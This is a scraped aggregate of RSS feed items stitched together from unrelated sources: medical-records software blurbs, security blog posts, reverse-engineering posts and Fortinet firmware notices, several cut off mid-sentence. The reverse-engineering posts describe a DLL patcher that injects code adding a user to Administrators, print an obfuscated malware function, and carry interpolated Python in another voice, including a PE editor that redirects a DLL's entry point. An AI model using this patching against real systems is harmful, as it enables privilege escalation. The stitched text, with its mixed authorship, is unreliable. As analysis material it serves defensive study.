http://feeds.feedburner.com/Docucrunch?format=xml Noteworthy's NetPractice EHRweb is web-based electronic health software that can be used by any practice, regardless of size and specialty. Its Version 7.02.0 has received the ONC-ATCB 2011-2012 designation for Stage 1 meaningful use (which is set by the feds for reimbursement for physicians adopting EMR for their offices). Unlike a traditional EMR, EHRweb allows [...]

==> MicroMD EMR

http://feeds.feedburner.com/Docucrunch?format=xml MicroMD EMR is an electronic medical record (EMR) solution that is not only appropriate for larger practices but for smaller (even solo) practices as well. It combines electronic records and practice management into one system, and is geared toward numerous specialties, such as family practice, pediatrics, internal medicine, and obstetrics and gynecology. The MicroMD EMR [...]

==> Allscripts MyWay

http://feeds.feedburner.com/Docucrunch?format=xml Allscripts MyWay combines electronic medical records (EMR) with practice management and claims management solutions. It is intended for smaller or solo practices that do not have IT staff or do not wish to spend a lot of money on EMRs. MyWay can also be integrated with an office's current practice management software. Currently, MyWay is [...]

==> NextGen: Patient Portal

http://feeds.feedburner.com/Docucrunch?format=xml The NextGen Patient Portal is a Web-based electronic health record (EHR) system that allows patients to be more proactive about their health and physician visits. It also is intended to help busy medical offices, especially smaller practices, cut down on administrative tasks, increase revenue, and provide better quality of care. The Patient Portal is integrated [...]

==> McKesson: Medisoft Clinical

http://feeds.feedburner.com/Docucrunch?format=xml McKesson's Medisoft Clinical software is a combination of both a practice management (via the Medisoft version 17 system) and electronic medical record (EMR) solution. It is intended for small practices with some limited staff that have a need to reduce time-consuming administrative tasks and still provide quality care to patients. Having recently received the Certification [...]

==> I Totally Owned Your Grandma…

http://hellnbak.wordpress.com/feed/ This was originally written by me and posted here as a guest blog: http://www.zdnet.com/blog/feeds/i-totally-owned-your-grandma-aka-social-networks-as-attack-platforms/2838 ========================================= Guest editorial by Steve Manzuik Lately there has been a lot of attention given to various privacy issues of social networking sites. Whether it is Google's Buzz automatically adding anyone you have ever emailed to your follow list or the [...]

==> Now for Something Completely Different

http://hellnbak.wordpress.com/feed/ Apologies to those who follow this blog just for my security geek content. But this time I am posting something completely different. For the three years I have lived in the bay area I have been partially a San Jose Sharks hockey fan as well as a Calgary Flames fan. I have taken all kinds [...]

==> Backpeddled But Still Very Wrong

http://hellnbak.wordpress.com/feed/ I guess all of the attention that the mindless blog post by eEye created has caused them to backpedal quite a bit. Sadly Morey is still way off the mark and if anything just made it more clear that he is attempting to use this as a reason you should buy their product and not use the [...]

==> How The Mighty Have Fallen

http://hellnbak.wordpress.com/feed/ Full Disclosure: I am a former eEye employee and managed their now pretty much dead Research Department. Something of which, after reading this post, I can honestly say I am embarrassed to admit. This is a classic case of the insane taking over the asylum. This morning a friend of mine pointed out this blog [...]

==> Apparently Time Has Reversed – Not The Disclosure Debate Again?!?

http://hellnbak.wordpress.com/feed/ Remember back in 2001 when researchers were compared to Terrorists and the term “Information Anarchy” was coined? You can read this blast from the past here –> http://www.windowsitpro.com/article/windows-client/information-anarchy-the-blame-game-.aspx As the saying goes, those who do not learn from history are doomed to repeat it, or something like that we have this clueless blog post over [...]

==> Murder – Just Like In The Video Games

http://hellnbak.wordpress.com/feed/ By now I am sure most of you have seen the “Collateral Murder” video that was released via Wikileaks. I do not want to get involved with the arm chair debates over what should or should not have happened. I have no real military experience to speak of unless being chased off a Canadian base [...]

==> Creepy GMail “Feature”

http://hellnbak.wordpress.com/feed/ I stumbled upon this creepy GMail “feature” the other day. Basically, it appears that there is some logic that notices when you type the phrase “see the attached” and then checks for a file attachment alerting you if you fail to attach a file. With all the privacy concerns around GMail I found this to [...]

==> Nexus-1 Honeymoon is Over

http://hellnbak.wordpress.com/feed/ As many of my friends know, I am very hard on my electronics. My laptops, my MP3 players, my cell phones and even the TV remote all get abused in various ways. So, in typical bleep fashion, over the weekend I dropped my Nexus-1 phone and sadly, even though it wasn't a far fall, a couple [...]

==> Clueless FUD Article…

http://hellnbak.wordpress.com/feed/ I haven't blogged anything of good use lately so I thought I would start up again by calling out this completely useless and incorrect opinion piece. On the Dark Reading blog an article appeared entitled "Share – Or Keep Getting Pwned". Sigh. Clearly zero research was done into this posting as there really is a lot of [...]

==> Week 41 in Review – 2012

http://infosecevents.net/feed/ Event Related Hack In The Box Hack In The Box 2012 – conference.hackinthebox.org Index for Hack In the Box 2012 materials. Hack In The Box: researcher reveals ease of Huawei router access – zdnet.com At Hack In The Box researcher Felix “FX” Lindner has shown how Huawei routers are easy to access with their static [...]

==> Week 40 in Review – 2012

http://infosecevents.net/feed/ Event Related Derbycon 2012 Videos – irongeek.com Hope you enjoyed the con! Here are the videos from Derbycon 2012. We had a few recording SNAFUs, but all in all it went very well. For the descriptions of the talks click a talk link below or go to the Derbycon page. Feel free to link or [...]

==> Week 39 in Review – 2012

http://infosecevents.net/feed/ Event Related Snoopy: A distributed tracking and profiling framework – sensepost.com At this year’s 44Con conference (held in London) Daniel and I introduced a project we had been working on for the past few months. Snoopy, a distributed tracking and profiling framework, allowed us to perform some pretty interesting tracking and profiling of mobile users [...]

==> Information Security Events For October

http://infosecevents.net/feed/ Here are information security events in North America this month: SecTor : October 1 to 3 in Toronto Canada WACCI 2012 : October 9 to 12 in Brookfield, WI USA HouSecCon 2012 : October 10 to 11 in Houston, TX USA SC World Congress 2012 : October 11 in New [...]

==> Week 38 in Review – 2012

http://infosecevents.net/feed/ Event Related Columbus OWASP Meeting Presentation – stateofsecurity.com Last week, I presented at the Columbus OWASP meeting on defensive fuzzing, tampering with production web applications as a defensive tactic and some of the other odd stuff we have done in that arena. Charlie Miller & Dino Dai Zovi at CodenomiCON 2012: iOS Hacker’s Update – [...]

==> Week 37 in Review – 2012

http://infosecevents.net/feed/ Event Related Man on the SecurityStreet Man on the SecurityStreet – Day 2 Continued. – community.rapid7.com Dave Kennedy, the founder of TrustedSec, gave an entertaining presentation called Going on the Offensive – Proactive Measures in Security your Company. Just like HD’s earlier presentation, we had our staff artist plot out the entire speech, which you [...]

==> Week 36 in Review – 2012

http://infosecevents.net/feed/ Resources Elderwood Project ‘Elderwood’ Crew, Tied to Google Aurora Attack, Targeting Defense, Energy, Finance Companies – threatpost.com The same team that attacked Google in the Aurora campaign in 2009 is still active and has been conducting a long-term campaign targeting defense contractors, financial services companies, energy companies, human rights organizations and government agencies using a [...]

==> Week 35 in Review – 2012

http://infosecevents.net/feed/ Event Related OWASP DCs Videos – vimeo.com Here are all of the videos that OWASP DC has uploaded to Vimeo. Appearances are videos that OWASP DC has been credited in by others. Stripe CTF 2 Web Challenges – abiusx.com I participated in the Stripe CTF Web Attacks and thus far it was the most [...]

==> Information Security Events For September

http://infosecevents.net/feed/ Here are information security events in North America this month: BSides St John’s : September 21 in St John’s USA VB2012 : September 26 to 28 in Dallas, TX USA DerbyCon 2012 : September 27 to 30 in Louisville, Kentucky USA GrrCON 2012 : September 27 to 28 in [...]

==> Week 34 in Review – 2012

http://infosecevents.net/feed/ Event Related BsidesLA Slides/Code – atenlabs.com So I whipped a talk recently to give at BSidesLA about how to stack tools voltron-style together and get some pretty gnarly successes. Here are some light talking points to give you an idea of what the subject matter was, but I should let the slides do most of [...]

==> The blog has moved…

http://infosecramblings.wordpress.com/feed/ After much thought and consideration, I decided to move my blog from wordpress.com to my own domain. The decision has nothing to do with the service provided by wordpress.com. I have never had any problems with this blog while it has been hosted by wordpress.com. There are other things I want to do with the [...]

==> Interesting Information Security Bits for 11/07/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Virtualization: How to Isolate Application Traffic Lori has penned a nice article pointing out how we can use VLANs to isolate application traffic. She makes and excellent point in the article, “we’ve grown to [...]

==> Interesting Information Security Bits for 11/06/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. TaoSecurity: Defining Security Event Correlation Richard has a good post up on defining security event correlation. Go check it out. Why use Firefox << Techdulla Techdulla tells us why he uses Firefox for his [...]

==> Interesting Information Security Bits for 11/05/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. CSI Stick – So who has a copy of your phone? << SANS Computer Forensics, Investigation, and Response This is both very cool and very scary. Tool that allows you to quickly and easily [...]

==> Interesting Information Security Bits for 11/04/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. /dev/random >> Blog Archive >> Critical dns2tcp Vulnerability! Looks like dns2tcp has a vulnerability that needs to be taken care of. Time to upgrade. TrueCrypt – Free Open-Source On-The-Fly Disk Encryption Software for Windows [...]

==> Resources to increase your info security knowledge and benefit your infosec career…

http://infosecramblings.wordpress.com/feed/ @GeekGrrl posted a note on her blog asking this question: 1) How would you recommend getting started on a career toward Network Security/Network Pen Tester? She has some follow-up questions to that first one requesting some specific information. Go read her post and then come back. . . . . Okay, here is what I [...]

==> Who needs employee exit procedures and disaster recovery plans are for whimps…

http://infosecramblings.wordpress.com/feed/ This article talks about the conviction of Pryavrat Patel for actions he took after his long-term contract employment with Pratt-Read was terminated. Now, what Mr. Patel did was definitely wrong, but frankly, Pratt-Read should probably put some thought into how they dealt with the situation too. It took them two weeks to recover from the [...]

==> Recap: RSA Europe 2008 Day 2

http://infosecramblings.wordpress.com/feed/ Hello again. Day 2 of RSA Europe 2008 was a busy one. I attended several sessions during the day and then the Security Catalyst, Security Bloggers, Security Twits get together happened that evening. This post will only talk about the day. The meet-up post will be later. Without further ado, let’s get to it. ‘The [...]

==> Recap: RSA Europe 2008 Day 1

http://infosecramblings.wordpress.com/feed/ Hi there folks. I am home and somewhat rested from my trip to London for the RSA Europe 2008 conference. It was a great trip and I enjoyed the conference. Below is a recap of my first day. This is going to be long, so hang in there. Information Security: From Ineffective to Innovative Arthur [...]

==> Elevation of Privilege DLL Patcher

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability but I need to create a proof-of-concept to show the feasibility of the vulnerability's exploitability. Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writeable by an unprivileged attacker. An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user. Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own. The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched in code relies on the function NetLocalGroupAddMembers(...) from netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse side effect of this is that this may cause the DLL to take a few extra milliseconds to load. The patcher is compatible with both 32-bit and 64-bit DLLs. 
You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you

==> Counting Lines of Source Code

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I'm reviewing the source code for a rather large project this week and I wanted to update my Facebook status by saying something like, "Jason is reviewing 100,000 lines of Java for security vulnerabilities." However, being the perfectionist that I am I wanted to give the real number of lines of code. I wasn't aware of any built-in functionality in Visual Studio to do this, and after three minutes of Googling, I found a lot of Visual Studio plugins that could do this but unfortunately I didn't find any instructions on how to do this with just plain Visual Studio. And honestly, I didn't want to install a plugin (see http://blogs.msdn.com/oldnewthing/archive/2006/03/22/558007.aspx :) I figured I could whip up a short C# program to do this, but even that seemed a little over-kill for such a simple task. Then I realized I could do this from a standard console window command prompt:

cmd /v:on
set lines=0
for /r %a in (*.java) do (
find /v /c "" "%a" > %temp%\temp.txt
for /f "tokens=6" %b in (%temp%\temp.txt) do (set /a lines += %b)
)
echo %lines%

The "tokens=6" part is specific to the source code directory structure for this particular project, and if any of the source code subdirectories contained spaces, you'd have to tweak the code above a little. But hey, it worked out quite nicely, and it was a much cleaner solution than installing a plugin. And I'm sure there's an even shorter/simpler way to do this from a standard command prompt than with what I have above. Feel free to post cleaner "solutions" :) (BTW, the actual number of lines turned out to be 348,523... that should keep me busy for a while.)

==> Investigating Outlook's Single-Instance Restriction (PART 2)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Please see PART 1. While the return value of FindWindowA is used to determine whether or not Outlook terminates its process, there's another issue when it comes to using a separate profile. Outlook calls MAPILogonEx without the MAPI_NEW_SESSION bit set. This causes Outlook to try to use an existing MAPI session if it can find one. Because of this, Outlook doesn't present the user with the option to choose a different profile in the second instance of Outlook; it will instead just use the profile that the first instance is using. (Why I didn't hit this issue in PART 1 is not clear.) As such, to fully overcome Outlook's single-instance limitation, it is necessary to spoof the return value of the FindWindowA call in PART 1 and to set the MAPI_NEW_SESSION bit in the flFlags argument passed to MAPILogonEx.

==> Loading Drivers in OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In a previous post, I talked about changing the Subsystem field in the IMAGE_OPTIONAL_HEADER to trick OllyDbg into loading a driver for the purpose of unpacking. However, making this single change is often not enough to be able to load the driver as an EXE in OllyDbg. From my experience (in other words, I haven't verified this in the Windows source code and I'm not speaking authoritatively here), executable files need to have NTDLL.DLL in their Import Table or have another DLL in their Import Table that will eventually cause NTDLL.DLL to get loaded. I was looking at a driver today that only had NTOSKRNL.EXE and HAL.DLL in its Import Table. The former causes BOOTVID.DLL and KDCOM.DLL to get loaded as well, however nowhere in the import chain does NTDLL.DLL get loaded. Because of this, OllyDbg can't get the driver up and running after we make the Subsystem change. To solve this problem, we can add NTDLL.DLL (or anything that imports NTDLL.DLL, like KERNEL32.DLL) to the Import Table of the driver and OllyDbg will then be able to load the driver as a new process.

==> Function Analysis

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it's still unclear what the function does. Since you don't have access to the callers of this function, I'll tell you this:
* The first argument is a null-terminated ASCII string.
* The second argument is a null-terminated ASCII string.
* The third argument is an integer.
Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations:
* Cannot refer to the name of a person, place, or time.
* Cannot refer to anything obscene or offensive.
* Cannot be found in a dictionary or web-search.
* Cannot use bleep-casing for compounding words -- must begin with one uppercase letter and end with all lowercase letters.
* Must be a "generic" name (for example, shouldn't contain the word "bot" or "worm", since I have no idea what class of malware I'll end up naming next).
* Must be humanly pronounceable.
* Must be between four and eight letters in length.
* I have final discretion over the name in case you think of something "bad" that isn't covered by one of the rules above.
The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does. And in case you think I'm "hiring cheap labor" to analyze this for me, I'll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I'll post my analysis which hashes to that MD5.
Here's the function:

sub_0 proc near
var_10 = dword ptr -10h
var_C  = dword ptr -0Ch
var_8  = dword ptr -8
var_4  = dword ptr -4
arg_0  = dword ptr 8
arg_4  = dword ptr 0Ch
arg_8  = dword ptr 10h

    push    ebp
    mov     ebp, esp
    sub     esp, 10h
    push    ebx
    push    esi
    push    edi
    mov     esi, [ebp+arg_4]
    mov     [ebp+var_8], 697A259Dh
    xor     [ebp+var_8], 182Ch
    inc     dword ptr ds:42C094h
    and     [ebp+var_C], 0
    and     [ebp+var_4], 0
    jmp     short loc_94
; -----------------------------------------------------------------------
loc_2A:                                 ; CODE XREF: sub_0+A6j
    xor     ebx, ebx
    add     [ebp+var_8], 3AA5h
    inc     dword ptr ds:42C094h
    xor     edi, edi
    jmp     short loc_81
; -----------------------------------------------------------------------
loc_3D:                                 ; CODE XREF: sub_0+8Fj
    mov     eax, [ebp+var_4]
    add     eax, edi
    mov     edx, [ebp+arg_0]
    movsx   eax, byte ptr [edx+eax]
    movsx   edx, byte ptr [esi+edi]
    cmp     eax, edx
    jnz     short loc_52
    inc     ebx
loc_52:                                 ; CODE XREF: sub_0+4Fj
    mov     ecx, esi
    or      eax, 0FFFFFFFFh
loc_57:                                 ; CODE XREF: sub_0+5Cj
    inc     eax
    cmp     byte ptr [ecx+eax], 0
    jnz     short loc_57
    cmp     ebx, eax
    jnz     short loc_72
    inc     [ebp+var_C]
    mov     eax, [ebp+arg_8]
    cmp     [ebp+var_C], eax
    jnz     short loc_72
    mov     eax, [ebp+var_4]
    jmp     short loc_C0
; -----------------------------------------------------------------------
loc_72:                                 ; CODE XREF: sub_0+60j
                                        ; sub_0+6Bj
    mov     eax, 43C9h
    mul     [ebp+var_8]
    mov     [ebp+var_10], eax
    mov     [ebp+var_8], eax
    inc     edi
loc_81:                                 ; CODE XREF: sub_0+3Bj
    mov     ecx, esi
    or      eax, 0FFFFFFFFh
loc_86:                                 ; CODE XREF: sub_0+8Bj
    inc     eax
    cmp     byte ptr [ecx+eax], 0
    jnz     short loc_86
    cmp     edi, eax
    jb      short loc_3D
    inc     [ebp+var_4]
loc_94:                                 ; CODE XREF: sub_0+28j
    mov     eax, [ebp+arg_0]
    mov     ecx, eax
    or      eax, 0FFFFFFFFh
loc_9C:                                 ; CODE XREF: sub_0+A1j
    inc     eax
    cmp     byte ptr [ecx+eax], 0
    jnz     short loc_9C
    cmp     [ebp+var_4], eax
    jb      short loc_2A
    mov     eax, 0FFFFh
    jmp     short loc_C0
; -----------------------------------------------------------------------
    mov     eax, 514Ah
    mul     dword ptr [ebp-8]
    mov     [ebp-10h], eax
    mov     eax, [ebp-10h]
    mov     [ebp-8], eax
loc_C0:                                 ; CODE XREF: sub_0+70j
                                        ; sub_0+ADj
    pop     edi
    pop     esi
    pop     ebx
    leave
    retn
sub_0 endp

And here's the raw byte-code for the function above:

5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200
8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC
01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3
7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8
4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01
0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8
5F5E5BC9C3
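My own reading of the listing, as an added worked example (this is not the author's analysis and I make no claim that it matches the hashed write-up): the arithmetic on var_8 and var_10 and the increments of the global at 42C094h never feed into a comparison, and the five instructions after the `jmp short loc_C0` at the end are unreachable. What remains is two nested loops, each bounded by an inline strlen. The Python below models only the surviving logic, and separately tracks the highest offset read from the first string, because sub_0 indexes `arg_0[var_4+edi]` without ever checking it against strlen(arg_0).

```python
NOT_FOUND = 0xFFFF          # what sub_0 returns when the outer loop runs out


def _run(s1: bytes, s2: bytes, n: int):
    """Model of sub_0.  s1 = arg_0, s2 = arg_4 (held in esi), n = arg_8.
    Returns (result, highest_s1_index_read).  Only the instructions that affect
    control flow or the return value are modelled; the junk arithmetic is dropped."""
    count = 0                                   # var_C, zeroed before the outer loop
    highest = -1
    for i in range(len(s1)):                    # var_4, loops while var_4 < strlen(arg_0)
        matched = 0                             # ebx, reset at loc_2A for every i
        for j in range(len(s2)):                # edi, loops while edi < strlen(arg_4)
            idx = i + j
            highest = max(highest, idx)
            # movsx eax, byte ptr [arg_0 + var_4 + edi]: no bounds check.  Index len(s1)
            # is the terminator; anything beyond it is an out-of-bounds read.  s2 is a C
            # string and holds no NUL byte, so those bytes can never complete a match,
            # but they are still read.  Modelled here as 0.
            c = s1[idx] if idx < len(s1) else 0
            if c == s2[j]:                      # cmp eax, edx / inc ebx
                matched += 1
            if matched == len(s2):              # cmp ebx, strlen(arg_4), after every byte
                count += 1                      # inc var_C
                if count == n:                  # cmp var_C, arg_8
                    return i, highest           # mov eax, var_4 ; jmp loc_C0
    return NOT_FOUND, highest                   # mov eax, 0FFFFh


def sub_0(s1: bytes, s2: bytes, n: int) -> int:
    """Index in s1 of the n-th occurrence of s2 (overlapping occurrences count), else 0xFFFF.
    n == 0 can never be satisfied, because var_C is incremented before it is compared."""
    return _run(s1, s2, n)[0]


def highest_s1_index_read(s1: bytes, s2: bytes, n: int) -> int:
    """Largest offset sub_0 reads from s1 for these arguments; a value greater than
    len(s1) means the function read past the string's terminator."""
    return _run(s1, s2, n)[1]


if __name__ == "__main__":
    print(sub_0(b"abcabcabc", b"abc", 2))
    print(hex(sub_0(b"abcabcabc", b"abc", 4)))
    print(highest_s1_index_read(b"ab", b"bcd", 1), "vs strlen", len(b"ab"))
```

Two properties fall out of the model that the disassembly hides: occurrences are counted with a stride of one, so they may overlap, and the inner loop always runs strlen(arg_4) iterations regardless of how close var_4 is to the end of arg_0, which is where the over-read comes from.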

==> Virus Bulletin 2006

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I bought my plane ticket a few hours ago for Virus Bulletin 2006. I'm looking forward to rubbing elbows with other virus analysts and discussing the latest and greatest reverse engineering tools and methods. If you're going to VB'06 as well, send me an e-mail or find me in person and mention my blog and I'll buy you a beer (which shouldn't be too hard seeing as how the conference will be in Montreal)!

==> Unpacking DLLs and Drivers with OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx People often ask me how to unpack DLLs and drivers. A common assumption is that it is necessary to use OllyDbg's LOADDLL for unpacking DLLs and that a ring-0 debugger such as SoftICE or WinDbg is necessary for unpacking drivers. With a little tweaking, we can use regular OllyDbg to unpack packed DLLs and even many packed drivers.

I don't know about you, but I've always had problems with LOADDLL. Even though it's well documented in OllyDbg's help file (the source is even included in the help file), I'd rather not use it if I don't have to. So how can we load a DLL into OllyDbg so that we can unpack it like we would a normal EXE? All you need to do is set the IMAGE_FILE_DLL bit to zero in the Characteristics field of the PE's IMAGE_FILE_HEADER structure. You could use a hex editor to make this change, but it's easier with a PE editor like LordPE. Once this flag is zeroed out, you can load the "DLL" into OllyDbg, and both OllyDbg and the OS will interpret it as an EXE. You can then unpack it as you would an EXE (trace to the OEP, dump, fix the imports, etc.), and then set the IMAGE_FILE_DLL bit back to one in the unpacked file.

The only catch is that many unpacking stubs check whether [EBP+0x0C] == 1 (i.e., whether the fdwReason argument to DllMain equals DLL_PROCESS_ATTACH), and if it doesn't equal 1 the stub won't continue to unpack itself. You can fix this problem by looking for this comparison and forcing a jump/no-jump, or by manually pushing three DWORDs onto the stack (before executing the first instruction at the EP), the second of which should be 1.

We can use the same PE header patching trick for loading drivers into OllyDbg for unpacking purposes. By setting the Subsystem field to 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI) in the PE's IMAGE_OPTIONAL_HEADER, OllyDbg and the OS will interpret the file as an EXE instead of as a driver. This allows us to trace through the unpacking stub until the code and data are unpacked, and we can dump the process when we find the OEP. Of course, if the unpacking stub is trying to execute instructions/functions that need to run from ring-0 then we won't be able to unpack it like this. However, if the unpacking stub is just doing a lot of simple XORing to unpack the original code and data, then we should be able to use this trick to successfully unpack the driver with OllyDbg.
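The header edits described in this post and in the DLL patcher post above (clearing IMAGE_FILE_DLL, setting Subsystem to IMAGE_SUBSYSTEM_WINDOWS_GUI, redirecting AddressOfEntryPoint and zeroing the Bound Import directory) are all fixed-offset writes into IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER. The script below is an added example, not the author's patcher and not LordPE: it uses only the Python standard library, handles PE32 and PE32+ (the DataDirectory array starts at different offsets in the two), and builds a header-only sample image inline so it runs without a real DLL. It does not append code or rewrite the Import Table, which the author's patcher also does; pass a file path on the command line to read the fields of a real image.

```python
import struct
import sys

IMAGE_FILE_DLL = 0x2000                 # IMAGE_FILE_HEADER.Characteristics bit
IMAGE_SUBSYSTEM_NATIVE = 1              # what a driver normally carries
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
DIR_BOUND_IMPORT = 11                   # DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT]


def _headers(data):
    """Validate the MZ/PE signatures; return (coff_offset, optional_header_offset, is_pe32plus)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                 # IMAGE_FILE_HEADER, 20 bytes
    opt = coff + 20                     # IMAGE_OPTIONAL_HEADER follows immediately
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%X" % magic)
    return coff, opt, magic == 0x20B


def _directory(opt, pe32plus, index):
    """File offset of DataDirectory[index]; the array starts at +96 (PE32) or +112 (PE32+)."""
    return opt + (112 if pe32plus else 96) + 8 * index


def inspect(data):
    """Read the fields that the OllyDbg tricks and the DLL patcher touch."""
    coff, opt, plus = _headers(data)
    characteristics = struct.unpack_from("<H", data, coff + 18)[0]
    return {
        "pe32plus": plus,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "entry_point": struct.unpack_from("<I", data, opt + 16)[0],   # AddressOfEntryPoint (RVA)
        "subsystem": struct.unpack_from("<H", data, opt + 68)[0],
        "bound_import": struct.unpack_from("<II", data, _directory(opt, plus, DIR_BOUND_IMPORT)),
    }


def make_loadable_as_exe(data):
    """Clear IMAGE_FILE_DLL and force a GUI subsystem, so the loader (and OllyDbg) treat a DLL or
    a driver as an ordinary EXE.  The fdwReason caveat from the post still applies: a stub that
    tests [EBP+0Ch] == DLL_PROCESS_ATTACH needs the stack fixed up by hand in the debugger."""
    buf = bytearray(data)
    coff, opt, _ = _headers(buf)
    characteristics = struct.unpack_from("<H", buf, coff + 18)[0]
    struct.pack_into("<H", buf, coff + 18, characteristics & ~IMAGE_FILE_DLL)
    struct.pack_into("<H", buf, opt + 68, IMAGE_SUBSYSTEM_WINDOWS_GUI)
    return bytes(buf)


def redirect_entry_point(data, new_entry_rva):
    """Point AddressOfEntryPoint at new code and zero the Bound Import directory, the two header
    edits the DLL patcher post describes.  The code at new_entry_rva must already exist in the
    image and must jump to the old entry point when it is done.  Returns (patched, old_entry)."""
    buf = bytearray(data)
    _, opt, plus = _headers(buf)
    old_entry = struct.unpack_from("<I", buf, opt + 16)[0]
    struct.pack_into("<I", buf, opt + 16, new_entry_rva)
    struct.pack_into("<II", buf, _directory(opt, plus, DIR_BOUND_IMPORT), 0, 0)
    return bytes(buf), old_entry


def build_sample_image(pe32plus=False, is_dll=True, entry=0x1000, subsystem=IMAGE_SUBSYSTEM_WINDOWS_GUI):
    """Constructed test input: a header-only image (no sections) carrying a fake Bound Import directory."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size,
                       0x0002 | (IMAGE_FILE_DLL if is_dll else 0))
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<I", opt, 16, entry)
    struct.pack_into("<H", opt, 68, subsystem)
    struct.pack_into("<II", opt, (112 if pe32plus else 96) + 8 * DIR_BOUND_IMPORT, 0x200, 0x20)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(inspect(f.read()))
    else:
        driver = build_sample_image(is_dll=False, subsystem=IMAGE_SUBSYSTEM_NATIVE)
        print("before:", inspect(driver))
        print("after: ", inspect(make_loadable_as_exe(driver)))
```

The write helpers return a new byte string rather than touching the input, so the original file can be kept next to the patched copy; remember to restore IMAGE_FILE_DLL (and the original Subsystem) in the dumped, unpacked file before anything tries to load it for real.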

==> FortiDDoS 3.1.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.1.2 B4 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDD_100A, FDD_200A, FDD_300A,

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B004 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiClient 4.3.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 4.3.5 B472 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x86, Windows_x64

==> FortiMail 4.3.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 4.3.3 B0520 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FE_100, FE_100C, FE_400, * FE_400B, FE_400C, FE_2000, * FE_2000A, FE_2000B, FE_3000C, * FE_3000C_LENC, FE_4000, FE_5001A, * FE_5002B, FE_VM, FE_200D,

==> FortiWeb 4.4.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.3 B0657 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiClient Android 4.1.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Android 4.1.1 B0019 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Android

==> FortiOS 4.3.10

